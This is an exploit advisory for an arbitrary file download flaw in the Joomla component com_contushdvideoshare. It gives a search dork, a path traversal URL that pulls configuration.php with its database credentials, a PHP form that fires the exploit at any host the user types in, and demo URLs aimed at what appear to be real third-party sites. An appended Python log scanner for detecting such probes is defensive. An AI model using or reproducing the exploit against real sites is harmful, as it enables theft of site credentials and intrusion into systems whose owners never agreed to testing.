
Joomla component com_contushdvideoshare - Arbitrary File Download Vulnerability

Author: AnonJoker , Published: 23-06-2015
# Exploit Title: Joomla component com_contushdvideoshare - Arbitrary File Download Vulnerability
# Google Dork: "com_contushdvideoshare" or "/components/com_contushdvideoshare/hdflvplayer/"
# Date: 23/06/2015
# Exploit Author: AnonJoker
# Vendor Homepage: Dork : www.hdflvplayer.net
# Software Link: http://www.hdflvplayer.net/
# Tested on: Win8, Linux
# Contact : anonjoki@gmail.com | FB.COM/ANONJOKER008
****

Proof Of Concept
localhost//components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php

****
Exploit :
//components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php
****
OR Use MY OWN Exploiter:






<?php
// Page shell and the first form, where a host name is entered.
echo "<body bgcolor='#000000'>";
echo '<center>';
echo '<form method="post">';
echo "<h4><font color='white'>www.site.com</font></h4><input type='text' name='target'>";
echo '<input type="submit" name="do">';
echo '</form>';

if (isset($_POST['do'])) {
    // Read the submitted host only after the form has been posted.
    $site = $_POST['target'];

    // Second form: its action is the download.php URL with the traversal value in f.
    echo "<form action='http://{$site}/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php' method='POST'>
 <b>Config</b>:<input type='text' name='_mysite_download_skin' value='../../../../../wp-config.php' placeholder='www.site.com'><br>
<input type='submit' value='Get CFG'>
</form>";
}

echo "<h5><font color='white'> AnonJoker | RTH </font></h5>";
echo '</center>';
echo '</body>';
?>



****
DEMO URL:
www.semanasantadesevilla.tv/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php
www.fanschoice.tv/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php
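
For defenders checking whether a site was probed this way, the following is an added example, not part of the original advisory: a Python scan of web access-log lines for requests to the download.php path above whose f parameter traverses out of the player directory, covering the double-slash form of the PoC and percent-encoded variants. The Combined Log Format layout and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Endpoint named in the advisory.
ENDPOINT = "/components/com_contushdvideoshare/hdflvplayer/download.php"
# Common/Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3}) (\S+)')

def normalise(value, max_rounds=3):
    """Undo nested percent-encoding (%252e -> %2e -> .) and unify separators."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def is_traversal(f_value):
    """True when f is an absolute path or contains a '..' path segment."""
    v = normalise(f_value)
    return v.startswith("/") or ".." in v.split("/")

def scan(lines):
    """Return one finding per request to ENDPOINT whose f value traverses."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, when, target, status, size = m.groups()
        # Split by hand: urlsplit() would read the PoC's leading "//" as a host.
        path, _, query = target.partition("?")
        if not re.sub(r"/+", "/", normalise(path)).endswith(ENDPOINT):
            continue
        for f_value in parse_qs(query).get("f", []):
            if is_traversal(f_value):
                # A 200 with a non-empty body suggests the file was returned.
                served = status == "200" and size not in ("-", "0")
                findings.append({"ip": ip, "time": when, "status": status,
                                 "f": normalise(f_value), "served": served})
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Jun/2015:10:01:02 +0000] "GET //components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php HTTP/1.1" 200 1843 "-" "-"',
    '198.51.100.9 - - [23/Jun/2015:10:05:40 +0000] "GET /components/com_contushdvideoshare/hdflvplayer/download.php?f=%252e%252e%252f%252e%252e%252f%252e%252e%252fconfiguration.php HTTP/1.1" 404 0 "-" "-"',
    '192.0.2.15 - - [23/Jun/2015:10:07:11 +0000] "GET /components/com_contushdvideoshare/hdflvplayer/download.php?f=intro.flv HTTP/1.1" 200 52311 "-" "-"',
    '192.0.2.15 - - [23/Jun/2015:10:07:30 +0000] "GET /index.php?option=com_contushdvideoshare HTTP/1.1" 200 9120 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A finding with `served` set to true means configuration.php contents, including the database credentials, should be treated as disclosed and rotated.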


#
#
#Greetz* To RTH - MYSELF - MY computer
